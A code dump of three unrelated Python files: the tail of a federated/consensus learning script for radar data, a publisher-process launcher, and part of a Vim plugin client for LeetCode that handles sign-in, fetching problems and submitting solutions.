# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
# np.random.seed(1)
# tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
if parameter_server:
epoch_global = 0
training_end = False
a = model.get_weights()
# set an arbitrary optimizer, here Adam is used
optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
# create a data object (here radar data)
#start = time.time()
if args.noniid_assignment == 1:
data_handle = RadarData_tasks(filepath, device_index, start_samples, samples, full_data_size)
else:
data_handle = RadarData(filepath, device_index, start_samples, samples, full_data_size,
args.random_data_distribution)
#end = time.time()
#time_count = (end - start)
#print(time_count)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
if frame_count % number_of_batches == 0:
if not parameter_server:
epoch_count += 1
# check scheduling for federated
if federated:
if epoch_count == 1 or scheduling_tx[device_index, epoch_count] == 1:
training_signal = False
else:
# stop all computing, just save the previous model
training_signal = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# check scheduling for parameter server
if parameter_server:
while not os.path.isfile(global_epoch):
# implementing consensus
print("waiting")
pause(1)
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
pause(5)
print("retrying opening global epoch counter")
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
print("failed reading global epoch")
if epoch_global == 0:
training_signal = False
elif scheduling_tx[device_index, epoch_global] == 1:
if epoch_global > epoch_count:
epoch_count = epoch_global
training_signal = False
else:
training_signal = True
else:
# stop all computing, just save the previous model
training_signal = True
# always refresh the local model using the PS one
stop_aggregation = False
while not os.path.isfile(global_model):
# implementing consensus
print("waiting")
pause(1)
try:
model_global = np.load(global_model, allow_pickle=True)
except:
pause(5)
print("retrying opening global model")
try:
model_global = np.load(global_model, allow_pickle=True)
except:
print("halting aggregation")
stop_aggregation = True
if not stop_aggregation:
model.set_weights(model_global.tolist())
if training_signal:
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# check schedulting for parameter server
# Local learning update every "number of batches" batches
time_count = 0
if frame_count % number_of_batches == 0 and not training_signal:
# run local batches
for i in range(number_of_batches):
start = time.time()
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample, training=False)
# Apply the masks
# for k in range(batch_size):
# class_v[k] = tf.argmax(classes[k])
# class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Take best action
# Calculate loss
loss = loss_function(masks, classes)
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
end = time.time()
time_count = time_count + (end-start)/number_of_batches
if not parameter_server and not federated:
print('Average batch training time {:.2f}'.format(time_count))
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Consensus round
# update local model
cfa_consensus.update_local_model(model_weights)
# neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
np.random.seed(1)
tf.random.set_seed(1) # common initialization
if not train_start:
if federated and not training_signal:
eps_c = 1 / (args.N + 1)
# apply consensus for model parameter
# neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor
# neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N, replace=False) # choose neighbor
neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
while neighbor == device_index:
neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N,
replace=False) # choose neighbor
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
# a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model)
training_signal = True # stop local learning, just do validation
else:
print("Consensus warm up")
train_start = False
# check if parameter server is enabled
# stop_aggregation = False
# if parameter_server:
# # pause(refresh_server)
# while not os.path.isfile(global_model):
# # implementing consensus
# print("waiting")
# pause(1)
# try:
# model_global = np.load(global_model, allow_pickle=True)
# except:
# pause(5)
# print("retrying opening global model")
# try:
# model_global = np.load(global_model, allow_pickle=True)
# except:
# print("halting aggregation")
# stop_aggregation = True
#
# if not stop_aggregation:
# # print("updating from global model inside the parmeter server")
# for k in range(cfa_consensus.layers):
# # model_weights[k] = model_weights[k]+ 0.5*(model_global[k]-model_weights[k])
# model_weights[k] = model_global[k]
# model.set_weights(model_weights.tolist())
#
# while not os.path.isfile(global_epoch):
# # implementing consensus
# print("waiting")
# pause(1)
# try:
# epoch_global = np.load(global_epoch, allow_pickle=True)
# except:
# pause(5)
# print("retrying opening global epoch counter")
# try:
# epoch_global = np.load(global_epoch, allow_pickle=True)
# except:
# print("halting aggregation")
del model_weights
#start = time.time()
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample, training=False)
# Apply the masks
# class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# class_v = np.zeros(batch_size, dtype=int)
# for k in range(batch_size):
# class_v[k] = tf.argmax(classes[k]).numpy()
# Calculate loss
# loss = loss_function(label_sample, classes)
loss = loss_function(masks, classes).numpy()
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
# mean loss for last 5 epochs
running_loss = np.mean(epoch_loss_history[-1:])
#end = time.time()
#time_count = (end - start)
#print(time_count)
if running_loss < target_loss: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFAS_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment,args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFAS_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
fileList = glob.glob('results/*.npy', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.h5', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.npz', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('*.mat', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
######################### Create a non-iid assignment ##########################
# if args.noniid_assignment == 1:
# total_training_size = training_set_per_device * devices
# samples = get_noniid_data(total_training_size, devices, batch_size)
# while np.min(samples) < batch_size:
# samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
t.append(threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)))
t[ii].start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t.append(threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated)))
t[devices].start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
publishers.py
|
import sys
import time
from requests import get
from multiprocessing import Process
from publisher import run_publisher
from stats import *
def run_producers(procs, count: int, duration, hosts, topics):
# Get unique IDs for the producers
public_ip = get('https://api.ipify.org').text
addr_part = public_ip.split('.')[1]
for i in range(0, count):
id = addr_part + str(i)
pubProcess = Process(target=run_publisher, args=(id, topics, hosts, duration))
procs.append(pubProcess)
pubProcess.start()
if __name__ == '__main__':
if len(sys.argv) < 5:
print("Usage: python src/publishers.py <no. pubs> <duration (s)> <zk hosts...> <topics...>")
exit(1)
count = int(sys.argv[1])
duration = float(sys.argv[2])
hosts = []
topics = []
for i in range(3, len(sys.argv)):
arg = sys.argv[i]
if ":" in arg:
hosts.append(arg)
else:
topics.append(arg)
procs = []
duration = float(duration)
run_producers(procs, count, duration, hosts, topics)
|
leetcode.py
|
import json
import logging
import re
import time
import os
from threading import Semaphore, Thread, current_thread
try:
from bs4 import BeautifulSoup
import requests
inited = 1
except ImportError:
inited = 0
try:
import vim
except ImportError:
vim = None
LC_BASE = os.environ['LEETCODE_BASE_URL']
LC_CSRF = LC_BASE + '/ensure_csrf/'
LC_LOGIN = LC_BASE + '/accounts/login/'
LC_GRAPHQL = LC_BASE + '/graphql'
LC_CATEGORY_PROBLEMS = LC_BASE + '/api/problems/{category}'
LC_PROBLEM = LC_BASE + '/problems/{slug}/description'
LC_TEST = LC_BASE + '/problems/{slug}/interpret_solution/'
LC_SUBMIT = LC_BASE + '/problems/{slug}/submit/'
LC_SUBMISSIONS = LC_BASE + '/api/submissions/{slug}'
LC_SUBMISSION = LC_BASE + '/submissions/detail/{submission}/'
LC_CHECK = LC_BASE + '/submissions/detail/{submission}/check/'
LC_PROBLEM_SET_ALL = LC_BASE + '/problemset/all/'
EMPTY_FREQUENCIES = [0, 0, 0, 0, 0, 0, 0, 0]
session = None
task_running = False
task_done = False
task_trigger = Semaphore(0)
task_name = ''
task_input = None
task_progress = ''
task_output = None
task_err = ''
log = logging.getLogger(__name__)
log.setLevel(logging.ERROR)
def enable_logging():
out_hdlr = logging.FileHandler('leetcode-vim.log')
out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
out_hdlr.setLevel(logging.INFO)
log.addHandler(out_hdlr)
log.setLevel(logging.INFO)
def _make_headers():
assert is_login()
headers = {'Origin': LC_BASE,
'Referer': LC_BASE,
'X-CSRFToken': session.cookies['csrftoken'],
'X-Requested-With': 'XMLHttpRequest'}
return headers
def _level_to_name(level):
if level == 1:
return 'Easy'
if level == 2:
return 'Medium'
if level == 3:
return 'Hard'
return ' '
def _state_to_flag(state):
if state == 'ac':
return 'X'
if state == 'notac':
return '?'
return ' '
def _status_to_name(status):
if status == 10:
return 'Accepted'
if status == 11:
return 'Wrong Answer'
if status == 12:
return 'Memory Limit Exceeded'
if status == 13:
return 'Output Limit Exceeded'
if status == 14:
return 'Time Limit Exceeded'
if status == 15:
return 'Runtime Error'
if status == 16:
return 'Internal Error'
if status == 20:
return 'Compile Error'
if status == 21:
return 'Unknown Error'
return 'Unknown State'
def _break_code_lines(s):
return s.replace('\r\n', '\n').replace('\xa0', ' ').split('\n')
def _break_paragraph_lines(s):
lines = _break_code_lines(s)
result = []
# reserve one and only one empty line between two non-empty lines
for line in lines:
if line.strip() != '': # a line with only whitespaces is also empty
result.append(line)
result.append('')
return result
def _remove_description(code):
eod = code.find('[End of Description]')
if eod == -1:
return code
eol = code.find('\n', eod)
if eol == -1:
return ''
return code[eol+1:]
def is_login():
return session and 'LEETCODE_SESSION' in session.cookies
def signin(username, password):
global session
session = requests.Session()
if 'cn' in LC_BASE:
res = session.get(LC_CSRF)
else:
res = session.get(LC_LOGIN)
if res.status_code != 200:
_echoerr('cannot open ' + LC_BASE)
return False
headers = {'Origin': LC_BASE,
'Referer': LC_LOGIN}
form = {'csrfmiddlewaretoken': session.cookies['csrftoken'],
'login': username,
'password': password}
log.info('signin request: headers="%s" login="%s"', headers, username)
# requests follows the redirect url by default
# disable redirection explicitly
res = session.post(LC_LOGIN, data=form, headers=headers, allow_redirects=False)
log.info('signin response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 302:
_echoerr('password incorrect')
return False
return True
def _get_category_problems(category):
headers = _make_headers()
url = LC_CATEGORY_PROBLEMS.format(category=category)
res = session.get(url, headers=headers)
if res.status_code != 200:
_echoerr('cannot get the category: {}'.format(category))
return []
problems = []
content = res.json()
for p in content['stat_status_pairs']:
# skip hidden questions
if p['stat']['question__hide']:
continue
problem = {'state': _state_to_flag(p['status']),
'id': p['stat']['question_id'],
'fid': p['stat']['frontend_question_id'],
'title': p['stat']['question__title'],
'slug': p['stat']['question__title_slug'],
'paid_only': p['paid_only'],
'ac_rate': p['stat']['total_acs'] / p['stat']['total_submitted'],
'level': _level_to_name(p['difficulty']['level']),
'favor': p['is_favor'],
'category': content['category_slug'],
'frequency': p['frequency']}
problems.append(problem)
return problems
def get_problems(categories):
assert is_login()
problems = []
for c in categories:
problems.extend(_get_category_problems(c))
return sorted(problems, key=lambda p: p['id'])
def get_problem(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'query': '''query getQuestionDetail($titleSlug : String!) {
question(titleSlug: $titleSlug) {
questionId
title
content
stats
difficulty
codeDefinition
sampleTestCase
enableRunCode
translatedContent
}
}''',
'variables': {'titleSlug': slug},
'operationName': 'getQuestionDetail'}
log.info('get_problem request: url="%s" headers="%s" body="%s"', LC_GRAPHQL, headers, body)
res = session.post(LC_GRAPHQL, json=body, headers=headers)
log.info('get_problem response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the problem: {}'.format(slug))
return None
q = res.json()['data']['question']
content = q['translatedContent'] or q['content']
if content is None:
_echoerr('cannot get the problem: {}'.format(slug))
return None
soup = BeautifulSoup(content, features='html.parser')
problem = {}
problem['id'] = q['questionId']
problem['title'] = q['title']
problem['slug'] = slug
problem['level'] = q['difficulty']
problem['desc'] = _break_paragraph_lines(soup.get_text())
problem['templates'] = {}
for t in json.loads(q['codeDefinition']):
problem['templates'][t['value']] = _break_code_lines(t['defaultCode'])
problem['testable'] = q['enableRunCode']
problem['testcase'] = q['sampleTestCase']
stats = json.loads(q['stats'])
problem['total_accepted'] = stats['totalAccepted']
problem['total_submission'] = stats['totalSubmission']
problem['ac_rate'] = stats['acRate']
return problem
def _split(s):
# str.split has an disadvantage that ''.split('\n') results in [''], but what we want
# is []. This small function returns [] if `s` is a blank string, that is, containing no
# characters other than whitespaces.
if s.strip() == '':
return []
return s.split('\n')
def _check_result(submission_id):
global task_progress
if _in_task():
prog_stage = 'Uploading '
prog_bar = '.'
task_progress = prog_stage + prog_bar
while True:
headers = _make_headers()
url = LC_CHECK.format(submission=submission_id)
log.info('check result request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('check result response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the execution result')
return None
if _in_task():
prog_bar += '.'
r = res.json()
if r['state'] == 'SUCCESS':
prog_stage = 'Done '
break
elif r['state'] == 'PENDING':
prog_stage = 'Pending '
elif r['state'] == 'STARTED':
prog_stage = 'Running '
if _in_task():
task_progress = prog_stage + prog_bar
time.sleep(1)
result = {
'answer': r.get('code_answer', []),
'runtime': r['status_runtime'],
'state': _status_to_name(r['status_code']),
'testcase': _split(r.get('input', r.get('last_testcase', ''))),
'passed': r.get('total_correct') or 0,
'total': r.get('total_testcases') or 0,
'error': [v for k, v in r.items() if 'error' in k and v]
}
# the keys differs between the result of testing the code and submitting it
# for submission judge_type is 'large', and for testing judge_type does not exist
if r.get('judge_type') == 'large':
result['answer'] = _split(r.get('code_output', ''))
result['expected_answer'] = _split(r.get('expected_output', ''))
result['stdout'] = _split(r.get('std_output', ''))
result['runtime_percentile'] = r.get('runtime_percentile', '')
else:
# Test states cannot distinguish accepted answers from wrong answers.
if result['state'] == 'Accepted':
result['state'] = 'Finished'
result['stdout'] = r.get('code_output', [])
result['expected_answer'] = []
result['runtime_percentile'] = r.get('runtime_percentile', '')
return result
def test_solution(problem_id, title, slug, filetype, code, test_input):
assert is_login()
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': test_input,
'lang': filetype,
'question_id': str(problem_id),
'test_mode': False,
'typed_code': code}
url = LC_TEST.format(slug=slug)
log.info('test solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('test solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot test the solution for ' + slug)
return None
actual = _check_result(res.json()['interpret_id'])
expected = _check_result(res.json()['interpret_expected_id'])
actual['testcase'] = test_input.split('\n')
actual['expected_answer'] = expected['answer']
actual['title'] = title
return actual
def test_solution_async(problem_id, title, slug, filetype, code, test_input):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
code = _remove_description(code)
task_name = 'test_solution'
task_input = [problem_id, title, slug, filetype, code, test_input]
task_trigger.release()
return True
def submit_solution(slug, filetype, code=None):
assert is_login()
problem = get_problem(slug)
if not problem:
return None
if code is None:
code = '\n'.join(vim.current.buffer)
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': problem['testcase'],
'lang': filetype,
'question_id': str(problem['id']),
'test_mode': False,
'typed_code': code,
'judge_type': 'large'}
url = LC_SUBMIT.format(slug=slug)
log.info('submit solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('submit solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot submit the solution for ' + slug)
return None
result = _check_result(res.json()['submission_id'])
result['title'] = problem['title']
return result
def submit_solution_async(slug, filetype, code=None):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
if code is None:
code = '\n'.join(vim.current.buffer)
task_name = 'submit_solution'
task_input = [slug, filetype, code]
task_trigger.release()
return True
def get_submissions(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
url = LC_SUBMISSIONS.format(slug=slug)
log.info('get submissions request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submissions response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submissions of problem: ' + slug)
return None
submissions = []
for r in res.json()['submissions_dump']:
s = {
'id': r['url'].split('/')[3],
'time': r['time'].replace('\xa0', ' '),
'status': r['status_display'],
'runtime': r['runtime'],
}
submissions.append(s)
return submissions
def _group1(match, default):
if match:
return match.group(1)
return default
def _unescape(s):
return s.encode().decode('unicode_escape')
def get_submission(sid):
assert is_login()
headers = _make_headers()
url = LC_SUBMISSION.format(submission=sid)
log.info('get submission request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submission response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submission: ' + sid)
return None
# we need to parse the data from the Javascript snippet
s = res.text
submission = {
'id': sid,
'state': _status_to_name(int(_group1(re.search(r"status_code: parseInt\('([^']*)'", s),
'not found'))),
'runtime': _group1(re.search("runtime: '([^']*)'", s), 'not found'),
'passed': _group1(re.search("total_correct : '([^']*)'", s), 'not found'),
'total': _group1(re.search("total_testcases : '([^']*)'", s), 'not found'),
'testcase': _split(_unescape(_group1(re.search("input : '([^']*)'", s), ''))),
'answer': _split(_unescape(_group1(re.search("code_output : '([^']*)'", s), ''))),
'expected_answer': _split(_unescape(_group1(re.search("expected_output : '([^']*)'", s),
''))),
'problem_id': _group1(re.search("questionId: '([^']*)'", s), 'not found'),
'slug': _group1(re.search("editCodeUrl: '([^']*)'", s), '///').split('/')[2],
'filetype': _group1(re.search("getLangDisplay: '([^']*)'", s), 'not found'),
'error': [],
'stdout': [],
}
problem = get_problem(submission['slug'])
submission['title'] = problem['title']
# the punctuations and newlines in the code are escaped like '\\u0010' ('\\' => real backslash)
# to unscape the string, we do the trick '\\u0010'.encode().decode('unicode_escape') ==> '\n'
submission['code'] = _break_code_lines(_unescape(_group1(
re.search("submissionCode: '([^']*)'", s), '')))
dist_str = _unescape(_group1(re.search("runtimeDistributionFormatted: '([^']*)'", s),
'{"distribution":[]}'))
dist = json.loads(dist_str)['distribution']
dist.reverse()
# the second key "runtime" is the runtime in milliseconds
# we need to search from the position after the first "runtime" key
prev_runtime = re.search("runtime: '([^']*)'", s)
if not prev_runtime:
my_runtime = 0
else:
my_runtime = int(_group1(re.search("runtime: '([^']*)'", s[prev_runtime.end():]), 0))
accum = 0
for runtime, frequency in dist:
accum += frequency
if my_runtime >= int(runtime):
break
submission['runtime_percentile'] = '{:.1f}%'.format(accum)
return submission
def _process_topic_element(topic):
return {'topic_name': topic.find(class_='text-gray').string.strip(),
'num_problems': topic.find(class_='badge').string,
'topic_slug': topic.get('href').split('/')[2]}
def _process_company_element(company):
return {'company_name': company.find(class_='text-gray').string.strip(),
'num_problems': company.find(class_='badge').string,
'company_slug': company.get('href').split('/')[2]}
def get_topics_and_companies():
headers = _make_headers()
log.info('get_topics_and_companies request: url="%s', LC_PROBLEM_SET_ALL)
res = session.get(LC_PROBLEM_SET_ALL, headers=headers)
log.info('get_topics_and_companies response: status="%s" body="%s"', res.status_code,
res.text)
if res.status_code != 200:
_echoerr('cannot get topics')
return []
soup = BeautifulSoup(res.text, features='html.parser')
topic_elements = soup.find_all(class_='sm-topic')
topics = [_process_topic_element(topic) for topic in topic_elements]
company_elements = soup.find_all(class_='sm-company')
companies = [_process_company_element(company) for company in company_elements]
return {
'topics': topics,
'companies': companies
}
def get_problems_of_topic(topic_slug):
request_body = {
'operationName':'getTopicTag',
'variables': {'slug': topic_slug},
'query': '''query getTopicTag($slug: String!) {
topicTag(slug: $slug) {
name
translatedName
questions {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
}
frequencies
}
}
'''}
headers = _make_headers()
log.info('get_problems_of_topic request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_topic response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the topic')
return {'topic_name': topic_slug, 'problems': []}
topic_tag = res.json()['data']['topicTag']
if not topic_tag:
return {'topic_name': topic_slug, 'problems': []}
if topic_tag['frequencies']:
id_to_frequency_map = json.loads(topic_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
